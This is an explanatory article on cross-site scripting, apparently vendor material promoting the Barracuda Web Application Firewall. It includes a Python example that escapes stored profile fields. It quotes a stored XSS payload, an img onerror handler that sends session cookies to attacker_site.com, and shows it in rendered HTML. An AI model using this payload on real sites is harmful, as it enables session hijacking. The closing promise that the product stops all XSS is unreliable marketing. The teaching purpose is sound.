XSS attacks fall into three categories: persistent (stored) XSS, reflected XSS and DOM-based XSS.
Persistent XSS attacks store malicious script on the web application server. Any user accessing the application becomes vulnerable to the script executing in their browser.
In DOM-based XSS attacks, no new script is injected into the web page; rather, an existing script's behavior is changed in unintended ways. Typically this is accomplished by altering a DOM element that the script trusts.
Client-side scripts have complete access to the DOM and can read or modify any part of it, enabling theft of session data, manipulation or theft of cookies, access to browsing history, and so on. For example, an attacker who succeeds in exploiting an XSS vulnerability can hijack the session of an authenticated user, and from there change the user's password and gain control of the victim's account or system.
Even more critically, XSS attacks can allow the whole client system to be controlled by an attacker. Malicious scripts can silently redirect client browsers to attacker-controlled domains serving malware such as browser exploit kits (for example, Blackhole). These kits profile the user's browser, including type, version and plugins, and then throw a kitchen sink full of exploits at it, targeting known and unknown vulnerabilities, including those in Adobe, Java and Microsoft plugins. Exploit kits are often the first to incorporate the latest threats, for which vendor patches do not yet exist, and are generally available for a few hundred dollars.
XSS injection is possible through any part of a request that is not properly sanitized before being incorporated into a subsequent response. Typical targets include:
- URL Parameters
- FORM Parameters (GET and POST parameters)
- HTTP Headers
- HTTP Referrer Objects
The attacker has injected the code (<img+src=ImageNotFound.gif+onerror=window.open('http://attacker_site.com/CaptureCookie.cgi?cookie='+document.cookie)>) into the address field of their profile, so that the session cookie of any victim (user) who views the attacker's profile is sent to the attacker. The stored value is then rendered unescaped in the profile page:
<title>All Form Fields</title>
<TR> <TD>First Name:</TD> <TD>John</TD></TR>
<TR> <TD>Last Name:</TD> <TD>Peter</TD></TR>
<TR> <TD>Address:</TD> <TD><img src=ImageNotFound.gif onerror=window.open('http://attacker_site.com/CaptureCookie.cgi?cookie='+document.cookie)></TD></TR>
<TR> <TD>Gender:</TD> <TD>Male</TD></TR>
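The defect in the profile page above is that the stored Address value is concatenated straight into the HTML response. As an added example (not the page's own code or the Barracuda product), the vulnerable rendering is shown beside a hardened version that HTML-entity encodes every untrusted field before it reaches the response; the profile dictionary is constructed from the table on the page.

```python
import html

# Constructed sample profile: the four fields from the page, with the
# stored payload quoted on the page sitting in the Address field.
PROFILE = {
    "First Name": "John",
    "Last Name": "Peter",
    "Address": "<img src=ImageNotFound.gif onerror=window.open("
               "'http://attacker_site.com/CaptureCookie.cgi?cookie='+document.cookie)>",
    "Gender": "Male",
}


def render_row_unsafe(label, value):
    """Vulnerable: the stored value lands in the response as live markup."""
    return f"<TR> <TD>{label}:</TD> <TD>{value}</TD></TR>"


def render_row_safe(label, value):
    """Hardened: every untrusted value is entity-encoded for an HTML text context.

    html.escape with quote=True (the default) rewrites < > & " and ' so the
    browser shows the payload as text instead of creating an <img> element
    with an onerror handler.
    """
    return f"<TR> <TD>{html.escape(label)}:</TD> <TD>{html.escape(value)}</TD></TR>"


def render_profile(profile, safe=True):
    """Build the 'All Form Fields' page from a profile dict."""
    row = render_row_safe if safe else render_row_unsafe
    rows = "\n".join(row(label, value) for label, value in profile.items())
    return f"<title>All Form Fields</title>\n<table>\n{rows}\n</table>"


def leaked_markup(profile, rendered):
    """Review check: return the untrusted values that survived as raw tags.

    Any stored value containing '<' that still appears verbatim in the
    output was not encoded and would execute in a victim's browser.
    """
    return [v for v in profile.values() if "<" in v and v in rendered]


if __name__ == "__main__":
    print(leaked_markup(PROFILE, render_profile(PROFILE, safe=False)))  # payload leaks
    print(leaked_markup(PROFILE, render_profile(PROFILE)))              # []
```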
The Barracuda Web Application Firewall immediately remediates XSS attacks. It contains comprehensive rule sets to detect plain or obfuscated XSS attacks in incoming requests. Out of the box, the default security policy defeats all XSS attacks without requiring any additional configuration or changes to web application code. Signatures are automatically updated to cover the latest threats.